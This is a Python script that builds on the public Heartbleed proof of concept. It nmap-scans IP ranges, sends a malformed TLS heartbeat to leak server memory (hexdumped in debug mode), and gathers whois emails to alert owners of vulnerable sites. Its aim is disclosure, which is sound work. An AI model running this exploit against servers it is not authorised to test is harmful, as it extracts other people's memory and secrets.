This a script to find the email addresses to the peple responsible for a HTTPS site that's found to be leaking memory according to the heartbleed bug. It will read the public certificate, find the CN (domain name, usually) and look that up via whois to gather email adresses to contact. Can dump to CSV.

heartbleed-alert

#!/usr/bin/env python2

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

# Quick patch for nmap support 08/04/2014 sartan
#found this was very handy to scan my own web ranges to see if they were vulnerable.

# Modification by olemartinorg on 09/04/2014 to collect more information on certifcates and alert
# the people responsible for a site


import sys
import struct
import socket
import time
import select
import nmap
import ssl
import OpenSSL
import subprocess
import re
from optparse import OptionParser

options = OptionParser(usage='%prog [range] [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160).  Range is nmap syntax; eg 192.168.1.0-192.168.1.254, 10.15.0.0/16, 192.168.5.1,192.168.5.2,192.168.5.3')
options.add_option('-c', '--csv', action='store_true', default=False, help='Output CSV instead of human-readable text')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
debug = False
csv = False


def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')


hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')


def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b:b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print


def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            try:
                data = s.recv(remain)
            except socket.error:
                return None
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata


def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        if debug:
            print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None

    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        if debug:
            print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None

    if debug:
        print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay


def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            if debug:
                print 'No heartbeat response received, server likely not vulnerable'

        if typ == 24:
            if debug:
                print 'Received heartbeat response:'
                hexdump(pay)
            if len(pay) > 3:
                if debug:
                    print 'WARNING: server returned more data than it should - server is vulnerable!'
                return True
            else:
                if debug:
                    print 'Server processed malformed heartbeat, but did not return any extra data.'

        if typ == 21:
            if debug:
                print 'Received alert:'
                hexdump(pay)
            if debug:
                print 'Server returned error, likely not vulnerable'

        return False


def scanhost(host, port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if debug:
        print 'Connecting... to', host, "on port", port
    sys.stdout.flush()
    try:
        s.connect((host, port))
    except:
        return False

    if debug:
        print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    if debug:
        print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            if debug:
                print 'Server closed connection without sending Server Hello.'
            return False
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    if debug:
        print 'Sending heartbeat request...'
    sys.stdout.flush()

    #Sartan is laazy lazy lazy lazy
    try:
        s.send(hb)
    except:
        return False

    try:
        return hit_hb(s)
    except:
        return False


def findemail(ip, port):
    cert = ssl.get_server_certificate((ip, port))
    x509 = OpenSSL.crypto.load_certificate(OpenSSL.crypto.FILETYPE_PEM, cert)
    comp = x509.get_subject().get_components()
    comp_dict = dict((x, y) for x, y in comp)

    if 'CN' in comp_dict:
        cert_host = comp_dict['CN'].lstrip('*.')
        try:
            socket.gethostbyname(cert_host)
        except socket.gaierror:
            # Looking up the hostname failed, so we'll assume the
            # CN is not a valid hostname
            if csv:
                print ip+",yes,"+cert_host+","
            else:
                print "The IP", ip, "is vulnerable, but i failed to look up the hostname in the certificate: ("+cert_host+")"
                print
            return

        cert_host = cert_host.lstrip('w.')

        try:
            whois = subprocess.check_output(['whois', cert_host])
        except subprocess.CalledProcessError:
            whois = ""

        email_re = re.compile(r'([A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,15})', re.MULTILINE | re.IGNORECASE)
        unique_emails = list(set(email_re.findall(whois)))

        if unique_emails:
            if csv:
                print ip+",yes,"+cert_host+","+(";".join(unique_emails))
            else:
                print "The IP", ip, "is vulnerable, and they seem to have a certificate belonging to", cert_host
                print "According to whois, you can alert some of these people:"
                print "; ".join(unique_emails)
                print
        else:
            if csv:
                print ip+",yes,"+cert_host+","
            else:
                print "The IP", ip, "is vulnerable, and they seem to have a certificate belonging to", cert_host
                print "Sadly, whois doesnt give me any email adresses for you to contact about this"
                print
    else:
        if csv:
            print ip+",no,,"
        else:
            print "The IP", ip, "is vulnerable, but i found no CN in their certificate"
            print


def startscan(hosts):
    nm = nmap.PortScanner()
    nm.scan(hosts, "443", arguments='--open -Pn')
    for ip in nm.all_hosts():
        for port in nm[ip]['tcp'].keys():
            if debug:
                print "Scanning", ip, port
            if scanhost(ip, port):
                findemail(ip, port)


def main():
    global debug, csv
    (opts, args) = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    debug = opts.debug
    csv = opts.csv

    if csv:
        print "ip,cn_found,hostname,emails"

    startscan(args[0])


if __name__ == '__main__':
    main()